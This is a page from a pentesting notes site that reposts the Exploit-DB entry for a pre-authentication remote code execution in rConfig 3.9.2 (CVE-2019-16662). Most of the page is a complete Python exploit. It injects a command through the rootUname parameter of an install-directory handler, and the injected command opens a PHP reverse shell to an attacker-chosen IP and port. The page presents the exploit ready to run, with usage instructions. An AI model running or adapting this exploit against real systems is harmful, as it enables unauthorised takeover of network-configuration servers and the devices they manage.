Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page
  • FILES
  • POC
  • ORIGINAL

Was this helpful?

  1. Exploit-DB

rConfig 3.9.2 - Remote Code Execution

https://awesome.hackpuntes.com/exploit-db/rconfig-3.9.2-remote-code-execution

Previouswinrar 5.80 64bit - Denial of ServiceNextXML Notepad 2.8.0.4 - XML External Entity Injection

Last updated 5 years ago

Was this helpful?

FILES

POC

ORIGINAL

# Exploit Title: rConfig 3.9.2 - Remote Code Execution
# Date: 2019-09-18
# Exploit Author: Askar
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
# CVE : CVE-2019-16662

#!/usr/bin/python

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)


rConfig-preauth.png
rConfig 3.9.2 - Remote Code ExecutionExploit Database
Logo
1MB
rconfig-3.9.2.zip
archive
Vulnerable software
1KB
rConfig-preauth.txt
Exploit PreAuth
2KB
rConfig-postauth.txt
Exploit PostAuth